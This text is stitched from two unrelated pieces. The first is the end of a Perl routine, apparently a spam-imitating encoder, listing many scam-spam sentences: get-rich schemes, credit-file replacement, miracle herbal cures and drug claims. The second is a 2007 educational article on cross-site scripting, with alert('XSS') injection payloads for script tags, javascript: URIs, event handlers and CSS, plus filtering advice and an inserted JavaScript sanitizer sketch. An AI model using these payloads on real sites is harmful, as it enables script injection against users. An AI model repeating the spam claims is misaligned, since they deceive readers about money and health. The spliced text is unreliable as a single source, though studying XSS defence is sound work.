YOUR ROAD TO FINANCIAL FREEDOM !

Under Bill s. 1618 TITLE 3 passed by the 105th us congress, this letter
cannot be considered SPAM, as long ad the sender includes contact information
and a method of "removal". To be removed from future mailings, just reply with
REMOVE in the subject line.

Thank-you for your kind consideration';

# Here's a ton of raw spam.  All of these blocks are similar for each genre.
# Don't add or remove lines unless you're trying to encode more characters,
# but you can change them almost as much as you want so long as you are sure
# that none contain .'s or !'s and that none of them contains another (eg.
# that one line isn't "Just BUY NOW" and another is "BUY NOW", which would
# confuse the script when it tried to decode them).  I personally validated
# all of these, but... :]

@tospam = <<'END_BUSINESS' =~ m/(\S.*\S)/g;
We sell the CD Your Not Suppose to Have BUSINESS SECRETS OF THE INTERNET
Learn to make THOUSANDS of dollars per hour while Surfing the Internet for PORN
Find out how To Beat Speeding Tickets confound the cops and get off scot free
You can get Information on Anyone you want for FREE online
Your messages can reach MILLIONS for pennies just like this one
You KNOW this works since just as you are reading this message yours will be read
If you want to be successful you must copy someone who is
I am willing to teach you the secrets that I have leaned in creating Financial Independence
I am looking for a few motivated individuals who are ready to start earning BIG MONEY
This is not MLM or a pyramid scheme or a get rich quick scheme
This is a REAL Legitimate business that requires motivated parteners
With Us Everyone Gets Approved No Upfront Fees For Application-Processing
While Others Charge You HUNDREDS OF DOLLARS to Get Set Up WE CHARGE ZERO FOR SETUP FEES
This is A Limited Time Offer So Take Advantage of it
Scroll to bottom of this email for our CONTACT INFORMATION to ORDER NOW
The Internet is the fastest growing industry in today's direct marketing business
Give your customers the convenience of ordering products right from your web page
Now tell me if this doesn't sound intriguing
With us you will have LIQUID ASSETS AVAILABLE ALMOST IMMEDIATELY
We Also offer SOFTWARE AND TERMINAL PACKAGES to reach your customers
Our terminal will allow you to receive the LOWEST DISCOUNT RATE per transaction available
Thank You for reading this and Heres to Bigger and Better Business
Thats right seventy seven MILLION FRESH AND VALID email addresses with NO duplications
You can offer your product to the online community TODAY
Using direct marketing is easier and cheaper a LOT easier and a LOT cheaper
Contact us to receive a collection of BULK EMAIL PROGRAMS to automate your mailouts
Our programs such as Express mail and Stealth Bomber all are very user friendly
These programs usually cost around HUNDREDS but are FREE to you when you invest with us
You can set your computer in the morning and it can send emails all day by itself
If you get only a one percent response from mailing to a list thats worth THOUSANDS
Imagine how much information you could get from a short survey sent to a mailing list like ours
We have been in this business for close to TWO YEARS now
We have a lot of satisfied customers who keep coming back to us for more
We hope to do business with you continuously for years to come
We have gone through the list in the past month and deleted any old addresses
We have also deleted any known SPAM haters
Our lists include almost every person on the Internet today with no duplications
People are making TONS of money right now by doing the same thing we are
With us the more people you send to the more money you will make
With our product we will also send you a copy of every law concerning email
We make it easy to obey the law and make a fortune
This offer is not for everyone
If you can see the value in this opportunity then now is the time to TAKE ACTION
Ours is a fantastic idea which has over FOUR MILLION users already
For checks in currencies other than US dollars please find details below
ALL INFORMATION NECESSARY FOR YOU TO SUCCESSFULLY MAIL QUICKLY PROPERLY AND LEGALLY IS PROVIDED
This email contains the ENTIRE PLAN of how YOU can make BIG MONEY NOW
Just read on and see how easy this is
Since everyone makes more as more people try it out it's been very exciting
Please read this program THEN READ IT AGAIN
Just follow the instructions and you will make money
This simplified e-mail marketing program works perfectly EVERY TIME
Email is the sales tool of the future
Take advantage of this virtually free method of advertising NOW
The longer you wait the more people will be doing business using email
The enclosed information is something I almost let slip through my fingers
I could NOT believe my eyes here was a MONEY MAKING MACHINE I could start immediately
Like most of you I was still a little skeptical and a little worried about the legal aspects
After determining the program was LEGAL I decided WHY NOT
I paid off ALL my debts and bought a much needed new car
Please take your time to read this plan IT WILL CHANGE YOUR LIFE FOREVER
This program does work but you must follow it EXACTLY
If you choose not to participate in this program I am sorry
This really is a great opportunity with little cost or risk to you
As the saying goes THE RICH GET RICHER AND THE POOR GET POORER
With us you can make more money in the next few months than you have EVER imagined
Just follow the program EXACTLY AS INSTRUCTED
Remember to email a copy of this exciting report to everyone you can think of
Remember that the more you send out the more potential customers you will reach
HERE IS HOW THIS AMAZING PROGRAM WILL MAKE YOU THOUSANDS OF DOLLARS
Our method of raising capital REALLY WORKS EVERY TIME
Before you say BULL please read this program carefully
This is not a chain letter but a perfectly legal money making business
Every state in the USA allows you to recruit new multilevel business partners
WITH US ORDERS COME BY MAIL AND ARE FILLED BY EMAIL so you are not involved in personal selling
You do this privately in your own home store or office
We have the EASIEST marketing plan anywhere
Your cost to participate in this is practically nothing
Placing a lot of FREE ads on the Internet will EASILY get a larger response
You should be prompt and professional and follow the directions accurately
You can KEEP TRACK of your PROGRESS by watching which report people are ordering from you
What you are about to read is tried and true and proven and effective
Above all our offer is utterly and ridicously excellent
Read on and weep with joy if you would like to know exactly how to begin making money
Nowhere else will you find such a complete package as this
YOU WILL SOON BE RAKING IN MONEY LIKE NOBODYS BUSINESS
This is the fastest way I have ever seen to make money
If you do not call us RIGHT NOW you will regret it for the rest of your life
Business opportunities like this do not come around every day you know
You would have to be an IDIOT not to BUY NOW
Our product is simply the BEST EVER
Unless you want to kick yourself later you MUST ORDER NOW
END_BUSINESS

foreach $line (@tospam) {    # Collapse whitespace to help matching.
$line =~ s/^\s+//;
$line =~ s/\s+$//;
$line =~ s/\s+/ /g;
warn "Erroneous punctuation (! or .) found in business spam." if $line =~ m/[!.]/;
}

return;
}

if ($needs eq "credit") {

$pad = qq'

FAX TOLL FREE TO 888.244.4366 or mail to:

The Credit Emporium
Attn: C. Spambert
MailRoom Post Office Box  #0715
Coral Springs, FL 33067-0215

** We respect your privacy and will not share
any of the above information with any other
persons or companies. **

………………………………………
This is a one time email transmission, either
requested by you or by someone you know. The
information provided is for educational
purposes only and FFS Ltd is not providing a
service. This offer is void where prohibited.
This cannot be considered spam as long as the
sender includes a method of removal at no cost
to the recipient as stated in bill s.1618
TITLE III passed by the 105th US Congress.
This is a one time email transmission; no need
for removal is required. If you do not respond,
FFS Lts will not contact you and you will be
automatically removed.';

@tospam = <<'END_CREDIT' =~ m/(\S.*\S)/g;
Good Bad or No Credit is NO PROBLEM with us
GET GUARANTEED EXCELLENT CREDIT IN THIRTY DAYS
If your credit is less than perfect then you must read this email
We have compiled a wonderful ebook GUARANTEED to give you an excellent credit rating
John Simmers tried this and removed every negative item off his credit report in two weeks
Over the last few years we have received thousands of positive letters from customers
With us FINANCIAL FREEDOM COSTS JUST A FEW DOLLARS
Print this now or save it to a folder for future reference
With us you can learn of the secret federal law that stops ALL your collection calls immediately
Thousands of Americans have used our service successfully we want YOU to be next
NO MORE will you have to be ashamed of your past
The Credit Secrets Manual reveals one of the greatest secrets in the world
Our attorneys have discovered a method of creating brand NEW credit files for their clients
With us you can destroy bad credit by taking advantage of a special consumer protection law
With us you can dump your bad credit using our suberb Credit File Replication Service
With our methods anyone can bury the past and put their bad credit behind them forever
Our service is really BONAFIDE and PROVEN to work for anyone
This product is so easy to use that a sixteen year old could do it
Thanks to us you will be in fear of your future NO MORE
All this involves is a little thinking and filling out forms and making phone calls
This product works just like THAT it is almost MAGICAL
I truly do bless the day I ordered this program YOU will too
This program has changed my life I now want it to change yours
You will be scared to apply for credit NO MORE
With us you can learn the Secret Key to getting your new credit file and how easy it is to do
We can get your new credit file without you ever leaving your house
Our goal is to make this program affordable so everyone can benefit from the power of it
Rich people have been using our secrets for years
We have a guaranteed way for legally getting an excellent credit rating almost instantly
Contact us to guarantee that you will quickly have EXCELLENT CREDIT
We will assist you in instantly adding UNLIMITED positive information to your credit file
My Proven Credit Advantage Program unconditionally guarantees you will qualify for loans
TRIPLE A ONE CREDIT IS WITHIN YOUR REACH
Our ebook tells you everything you will ever need to know
With ONE CALL we can get your creditors to leave you alone
Complete Our Simple Online Form To Receive Your Free Debt Analysis
Our programs can get you the cash you need
This all comes with our RISK FREE DOUBLE YOUR MONEY BACK GUARANTEE
If your credit isnt so great your interest rate will be higher
We can tell you the Six Credit Card Secrets Banks Dont Want You to Know
With Us You Will Learn The Guerrilla Tactics That Will Give You A Good Credit Rating
We know Surefire Methods Of Raising Instant Cash
This is NOT another credit scam OUR methods are TOTALLY LEGAL
Do NOT get suckered by the cheap waffle packed guides offered elsewhere
We will NOT waste your time with flowery sales letters and empty promises
WE are the real deal WE tell it like it IS
Sign up NOW and become part of our CASH ADVANTAGE PROGRAM
WE use the only legitimate way to get you new credit files
We can Add YEARS of AAA credit to your PERSONAL credit report in just days
You can never lie or be dishonest and STILL get the credit you need and deserve without hassle
You should follow the example of thousands of ordinary people who use this system everyday
You can use our services to maintain complete anonymity in your financial dealings
You can purchase everything you buy at below wholesale prices and on credit
Our services will NOT lead you to do anything illegal immoral or unethical
We do NOT send you on letter writing campaigns that produce no results
We will not have you to use untested methods that do not work in the real world
We will NOT make you use a bogus TIN or EIN number on credit applications
Our customers are SHOCKED at how quickly and easily they have restored their credit
We have perfected a system called the GoldPro Credit Restoration Program which is AWESOME
With us you just go through our EASY five step program to establish the credit you deserve
If you want to buy a home our methods will virtually GUARANTEE your success
With us you will now be able to easily qualify for any credit you desire
My program unconditionally guarantees that you will qualify for all kinds of loans
If you do not fix your credit you might as well throw MONEY out the window
You CAN Save Thousands of Dollars in Interest and Late Charges
We offer a NO OBLIGATION FREE CONSULTATION WITH STRICT PRIVACY
The credit industry is constantly changing to anticipate the demands of customers like you
We look forward to EARNING your business
Do not delay in ordering from us your good credit depends on it
With our help you will have ULTRA LOW INTEREST RATES
When we are finished you will have a copy of YOUR unblemished credit file
You Can Join our Lenders Network for FREE
YOU SHOULD NEVER SETTLE FOR A SINGLE QUOTE AGAIN WHEN YOU CAN GET MANY OFFERS WITH US
The information you provide to our Financial Experts will help you get the results you deserve
With us you will discover why bankruptcy may actually improve your credit rating
You can learn to Restart your life Completely Debt-Free
Find out how to stop your creditors dead in their tracks with our foolproof debt solutions
Find out how to know if you need a lawyer to help you
Let us help you get out of debt NOW
We can even help you consolidate your debts into one low monthly payment
Do not even think of filing bankrupcy without reading this message
This request is totally risk free since no obligation or costs are incurred
By working with us we can cut your payments in HALF
We have Special Programs for Self Employed Borrowers
We have programs for EVERY credit situation
You could get CASH BACK within ONE DAY of approval
Our professional debt negotiators can instantly reduce your interest rates
We WILL Get Your Creditors Off Your Back
Our credit history eraser is NOT a loan
WE ARE THE TOP ONLINE SOURCE FOR APPROVING CREDIT CHALLENGED INDIVIDUALS
With your new credit rating you will feel like a KING
You simple MUST ORDER NOW or you will regret it
Without us you might face BANKRUPCY
END_CREDIT

foreach $line (@tospam) {    # Collapse whitespace to help matching.
$line =~ s/^\s+//;
$line =~ s/\s+$//;
$line =~ s/\s+/ /g;
warn "Erroneous punctuation (! or .) found in credit spam." if $line =~ m/[!.]/;
}

return;
}

if ($needs eq "cures") {

$pad = qq'

Order online and save. Visit us at http://www.iscsale.com/

Please print and postal mail to:

Chess Industries
PO BOX 97-0531
Coconut Creek, FL 33097-0531

or FAX toll free to 800.708.5714.

~ ~ ~   ~ ~ ~    ~ ~ ~   ~ ~ ~   ~ ~ ~   ~ ~ ~   ~ ~ ~    ~ ~ ~
Your Email Address Removal/Deletion Instructions:

We comply with proposed federal legislation regarding unsolicited
commercial email by providing you with a method for your email address to be
permanently removed from our database and any future mailings from our
company.

To remove your address, please send an email message with the word REMOVE
in the subject line to: processrequest\@adexec.com
If you do not type the word REMOVE in the subject line,your request to be
removed will not be processed.
';

@tospam = <<'END_CURES' =~ m/(\S.*\S)/g;
The results have been truly remarkable
You will understand once you try it yourself
Remember that it wont work if you don't try it
Please delete this now if such messages are annoying to you
You have been invited to participate in a thirty day free trial
This is an UNBELIEVEABLE OFFER for the Ultimate Herbal Experience
Absolutely LEGAL and Marvelously POTENT
Kiff possess all of the positive virtues fine ganja or cannabis without any of the negatives
These all have NO side effects NO dependency and are Vivaciously Mellow
It is formulated in accordance with the Taoist herbal principle of botanical interactiveness
All products are Satisfaction Guaranteed you will NOT want to miss out on them
TRY THE BODY MIND AND SPIRIT HEAVENLY INTRO COMBINATION OFFER
GET THIS Erotic Aphrodisia it is a wonderful Sexual Intensifier
These are made with herbs of Power which are master blended to emphasize body mind and spirit
Our products are best when taken upon an empty stomach
Persons taking any precsription medication should consult with their health care providers
Try our obscure multidimensional singular leafy smoking and brewing ethnobotanicals
TRY our LEGAL CANNABIS ALTERNATIVES they will help you MeLoW OuT
There is ABSOLUTELY nothing else quite like our herbs
Our HERBS are blended according to ancient Tanatric methods of exploring the pleasure of SEX
Using these herbs you can explore ancient and exotic SEXUAL EXPEREMENTS LEGALLY
I guarantee your life will never be the same again SEEING IS BELIEVING
I truly look forward to making you another SATISFIED CLIENT
Use our herbs to enjoy Tantra which is the art of CARNAL SEXUAL exploration
These herbs are major mood enhancers they make you feel HAPPY and SERENE
Our ginsing increases physical and mental endurance MASSIVELY
The ginsenosides in our ginsing have bee proven to help the body to respond to stress
This offer is NOT available in stores
Order now and get a FREE herb pipe for your SMOKING PLEASURE
Use our viripotent cannabis alternatives for blissful regressions of vexatious depressions
Our kiff is indeed the BEST marijuana or cannabis alternative on the planet
Our amalgamations are high concentrates of rare euphoric herbas for maximum PLEASURE
We use only the highest quality Chavana Prash and Black Seed Herbs in our amalgams
We have tons of hard to get Asian Herbs for Serenity and Joyful Living
With these herbs you can experience the dynamic energization of body mind and spirit
Our special compounds prolificate molecular communion to achieve herbal efficaciousness
Every item is always on sale on our website so visit there NOW
Many people do not realize the hidden dangers of Excessive Stress in their lives
Everyone at one time or another can use a health enhancing vitamin supplement or herbal remedy
The ISC Wellness Association can help you find the perfect gift
Try these today and feel the energy flow you need to get things done
Stress has often been referred to as a silent killer
We have just what you are looking for
CARE FOR YOUR SKIN THE WAY NATURE INTENDED
Put your best face forward by using our Skin Care Products
Most people love the natural nourishing qualities of our products and you will too
We offer more than just vitamins herbs and supplements
While the FDA will not allow us to call this a miracle cure we do not know what else to call it
Clinical tests of our products have show that they enhance SEXUAL ECTASY
Use our androstenedione to unlock your natural sexual potential
These offers are NOT available in stores
Try our tribulus terrestis to increase Luteinzing hormone levels
THOUSANDS OF SATISFIED CUSTOMERS CANNOT BE WRONG
Get What Is Perhaps The Most Powerful Aphrodisiac Ever Discovered
Get More Energy And Explode Your Sex Life
Drop Those Extra Pounds And Feel Like A Teenager Again
Turn Your Life Around With Herbal Medicine
Get Back In Control Of Your Life
Consult With A Herbal Professional Today
Get some of our HUNZA DIET BREAD it is said to beat all fad diets hands down
IF YOU'VE BEEN LOOKING FOR THE MIRACLE FOR LOSING WEIGHT WITH NO HUNGER    THEN READ ON
These are all TOTALLY Natural with no negative side effects
WE ARE BLOWING THE PHARMACY GUIDE OUT DURING THIS SPECIAL
Get all the EXPERIMENTAL DRUGS you need here
Order from us and we can even send your presecriptions in by mail
We have put together THE COMPLETE PHARMACY GUIDE of MEXICO to help you save BIG MONEY on drugs
The Information we have obtained may be Your First Step towards a better tomorrow
If you do not have health insurance you are paying extremely high prices for your medications
With our services you do not need to leave the privacy and comfort of your home
GO TO OUR WEBSITE NOW AND JOIN OUR CLUB
You can order EVERYTHING online from us
Lose weight and inches without stimulants using our products
Lower cholesterol without drugs with our products
Control acne without antibiotics with our all NATURAL herbal remedies
You Should Use Our Herbal V Which is An Incredible All Natural Natural Alternative to Viagra
Welcome to the New Sexual Revolution
We Use ONLY The Highest Quality Pharmaceutical Grade Pure Nutriceuticals
With The Herbs We Sell You Can Be a Real Man Again
These amazing formulas first became popular with Hollywood insiders and the wealthy elite
Simply put these can make your sex life INCREDIBLE
According to clinical trials our products really are CURE ALLS
These cures are so wonderful the FDA is keeping them SECRET
You simply have to learn the PLEASURES of these herbs which THEY do not want you to know
END_CURES

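foreach $line (@tospam) {    # Collapse whitespace to help matching.
# Bind each substitution to $line; the loop variable is not $_.
$line =~ s/^\s+//;
$line =~ s/\s+$//;
$line =~ s/\s+/ /g;
warn "Erroneous punctuation (! or .) found in cure all spam." if $line =~ m/[!.]/;
}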

return;
}

# Just in case someone adds new genres too & is forgetful :]
warn "Error: invalid call to get_spamtype($needs)";
}

Cross Site Scripting – The Technical Details

March 3, 2007

Cross Site Scripting: The Technical Details
===========================================

By snooq <jinyean@hotmail.com>

One and a half months after my public presentation on the topic, I have gathered some feedback. Generally, I feel that I failed to address the issue in more detail. Therefore, I have decided to write an article to follow up on the issue, to benefit those who are really
keen on knowing the ‘dirty’ stuff.

I. Brief Introduction
II. Common Techniques of Code Injection
III. Countermeasure
IV. Conclusion
V. Glossary
VI. References

I. Brief Introduction

This article attempts to explain the anatomy of Cross Site Scripting holes.
While XSS may show up in many places in a web application, I will only focus
on one subset of the XSS issue – malicious code injection, particularly,
Javascript injection. Generally, the same concepts are also applicable to other
scripting languages like VBScript, JScript and so on.

The readers are assumed to have some knowledge of Cross Site Scripting bugs.
A little knowledge of HTML, CSS and JavaScript is helpful in understanding
the issue.

I feel that the XSS issue is often overlooked or not correctly taken care of.
This seemingly trivial hole is a far more complex problem to solve than
I had imagined it to be. It is my intention to tell you how the typical
XSS holes manifest themselves. Hopefully, you will be able to defend yourself,
build better web applications or, at the very least, evaluate your risk better.

II. Common Techniques of Code Injection

Many web applications today are rather interactive. Very often, many parts of
the web site are under our manipulation. For example, a forum, a web messaging
system and so on. In these applications, users can post messages and most of the
time, users are allowed to post messages with HTML tags for formatting. Now, all
these nice ‘features’ open up opportunities for attackers to inject malicious
code into the web sites if the web applications are poorly written.

As far as I know, there are several categories of code injection techniques:
(if you know of any techniques not listed here, please tell me)

1) Script Tags
==============

<script>alert('XSS')</script>

Variations:

-> %3Cscript%3Ealert('XSS')%3C/script%3E
-> <script>alert('XSS')</script>
-> and so on…

2) Inline Code – Javascript pseudo-protocol
===========================================

<img src="javascript:alert('XSS')">

Variations:

-> <img src="javascript:alert('XSS')">
-> and so on…

3) Event Handler
================

<href src="xxx" onmouseover="javascript:alert('XSS')>

Variations:

-> <href src="xxx" onmouseover="javascript:alert('XSS')>
-> and so on…

4) The Cascading Style Sheet Way
================================

<br style="background-image:url(javascript:alert('XSS'));">

Variations:

-> <br style="background-image:url(javascript:alert('XSS'));">

5) Expression Evaluation in CSS
===============================

<br done="false" style="word-spacing:expression(!(eval(this.done))?alert('XSS'):0);
word-wrap:expression(this.done=true);)">

Notes: 1) to 3) work on most browsers but 4) and 5) work on IE browsers only.

As you can see by now, it is not quite viable to list every possible variation of the injection
techniques. Likewise, it is also not very viable to filter Javascript in HTML tags by hardcoded
rules.

III. Countermeasure

Looking at the 5 categories of techniques, let us go through them one at a time and see what
can be done to stop such attacks. As I am not a professional programmer, the countermeasures that
I put forward here are for reference only.

1) Script Tags
==============

This is the easiest to tackle. A simple translation rule that translates “<” to “&lt;”
and “>” to “&gt;” will do the job pretty well.

2) Inline Code – Javascript pseudo-protocol
===========================================

Again, this is also relatively easy to filter. A proposed countermeasure will be:

-> search for pattern ‘javascript’ and its variations like ‘javascript’
-> replace the pattern found with another harmless string
-> or just simply delete it

3) Event Handler
================

Things are getting tougher for the programmers now. For every HTML tag that is allowed
in the message, we have to search for all possible event handlers and defang them.

For instance, search for the string “onmouseover” and replace it with “” or another harmless string.

4) The Cascading Style Sheet Way
================================

This one is really a pain in the ass. I would suggest you look at the CSS specifications
for a complete picture of the problem. Anyway, a suggestion (not tested though) will be:

-> be really paranoid and disallow CSS in tags totally
-> this means that we have to search for ‘style’s and defang them
-> or we may also try searching for pattern ‘javascript’ and its variations like ‘javascript’
and replace them with a harmless string

5) Expression Evaluation in CSS
===============================

Here comes, finally, an ultimate test for the programmers. Maybe, the safest way to deal with this
one is to disallow CSS completely by filtering ‘style’.

By now, we should realise that our defense against the XSS problem is a very clumsy one. As there are
just too many items to check for in our list, many programmers often overlook some of them, especially
XSS of type 4 and 5.
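
An added example, not part of snooq's article: rather than searching for each pattern and defanging it, this sketch escapes the whole message and then restores only a fixed allowlist of attribute-free formatting tags, so the same rule covers all five categories. The function names and the tag allowlist are assumptions chosen for illustration.

```javascript
// Added example: names and the tag allowlist are assumptions.
const ALLOWED_TAGS = new Set(["b", "i", "u", "em", "strong", "p", "br"]);
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can open a tag, attribute or entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Escape the whole message first, then restore only bare allowlisted tags.
// A tag that carries any attribute (src, style, on*) does not match the
// pattern, so it stays escaped and is displayed as plain text.
function renderMessage(raw) {
  const bareTag = /&lt;(\/?)([a-zA-Z][a-zA-Z0-9]*)\s*\/?&gt;/g;
  return escapeHtml(raw).replace(bareTag, (match, slash, name) => {
    const tag = name.toLowerCase();
    return ALLOWED_TAGS.has(tag) ? `<${slash}${tag}>` : match;
  });
}

// Tags that survive as live markup in the rendered output.
function liveTags(html) {
  return html.match(/<[^>]*>/g) || [];
}

// The article's five sample strings, retyped with ASCII quotes.
const ARTICLE_SAMPLES = [
  "<script>alert('XSS')</script>",
  "<img src=\"javascript:alert('XSS')\">",
  "<href src=\"xxx\" onmouseover=\"javascript:alert('XSS')>",
  "<br style=\"background-image:url(javascript:alert('XSS'));\">",
  "<br done=\"false\" style=\"word-spacing:expression(!(eval(this.done))?alert('XSS'):0);" +
    "word-wrap:expression(this.done=true);)\">",
];

for (const sample of ARTICLE_SAMPLES) {
  console.log(liveTags(renderMessage(sample)).length, renderMessage(sample));
}
console.log(renderMessage("<B>bold</B> and <br/> are kept"));
```

Unbalanced allowlisted tags can still disturb page layout, so a production renderer would also close them; that is outside what this sketch shows.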

IV. Conclusion

At the time of writing, I am not aware of any one-size-fits-all solution that will painlessly eradicate
XSS problems. And I believe such a solution may not materialise at all in the near future. Thankfully,
we have yet to see mass exploitation of XSS holes in the wild that causes significant financial loss.
But, before it happens to us, we have to be extra cautious when building web applications.

V. Glossary

XSS    Cross Site Scripting
CSS    Cascading Style Sheet

VI. References

1) http://www.w3.org/TR/REC-CSS1
2) http://www.idefense.com/XSS.html
3) http://www.cgisecurity.com/articles/xss-faq.shtml

-=snooq=-

